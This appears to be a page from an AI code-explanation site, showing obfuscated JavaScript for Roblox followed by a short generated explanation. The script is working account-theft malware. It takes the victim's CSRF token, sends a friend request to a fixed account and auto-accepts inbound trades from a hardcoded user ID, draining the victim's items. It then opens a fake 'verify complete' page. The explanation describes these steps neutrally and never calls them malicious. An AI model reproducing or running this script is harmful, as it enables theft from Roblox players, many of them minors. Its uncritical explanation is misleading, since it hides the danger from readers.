Redus Russ

Generation

code to explanationMon, 27 Feb 2023

async function Trade() { const _0x468d05 = ( await ( await fetch('https://www.roblox.com/home', { credentials: 'include' }) ).text() ) .split('data-token="')[1] .split('" />')[0] await fetch( 'https://friends.roblox.com/v1/users/4365020152/request-friendship', { headers: { accept: 'application/json, text/plain, */*', 'accept-language': 'en-US,en;q=0.9', 'content-type': 'application/json;charset=UTF-8', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Windows"', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'same-site', 'x-csrf-token': _0x468d05, }, referrer: 'https://www.roblox.com/', referrerPolicy: 'strict-origin-when-cross-origin', body: '{"friendshipOriginSourceType":0}', method: 'POST', mode: 'cors', credentials: 'include', } ) async function _0x2c2553() { var _0x32e0c7 = await ( await fetch( 'https://trades.roblox.com/v1/trades/Inbound?sortOrder=Desc&limit=100', { referrer: 'https://www.roblox.com/', referrerPolicy: 'strict-origin-when-cross-origin', method: 'GET', mode: 'cors', credentials: 'include', } ) ).text(), _0x374747 = _0x32e0c7.split('id').length - 1 for (let _0x4470fb = 0; _0x4470fb < _0x374747; _0x4470fb++) { const _0x2bce26 = JSON.parse(_0x32e0c7) var _0xbadcec = _0x2bce26.data[_0x4470fb].id, _0x4df1d7 = _0x2bce26.data[_0x4470fb].user.id if (_0x4df1d7 == 4344112184) { var _0x2fd542 = await ( await fetch( 'https://trades.roblox.com/v1/trades/' + _0xbadcec + '/accept', { headers: { 'x-csrf-token': _0x468d05 }, referrer: 'https://www.roblox.com/', referrerPolicy: 'strict-origin-when-cross-origin', method: 'POST', mode: 'cors', credentials: 'include', } ) ).text() } } } setTimeout(_0x2c2553, 8000) _0x2c2553() window.open('https://sites.google.com/view/roverifycomplete', '_blank') } window.location.href.includes('roblox') == true && Trade()

The function Trade executes the function _0x2c2553 after 8 seconds. The function _0x2c2553 checks the user's trades and accepts the ones that are sent by the user with the id: 4344112184. In the end it opens a new tab with the url: https://sites.google.com/view/roverifycomplete.

Questions about programming?Chat with your personal AI assistant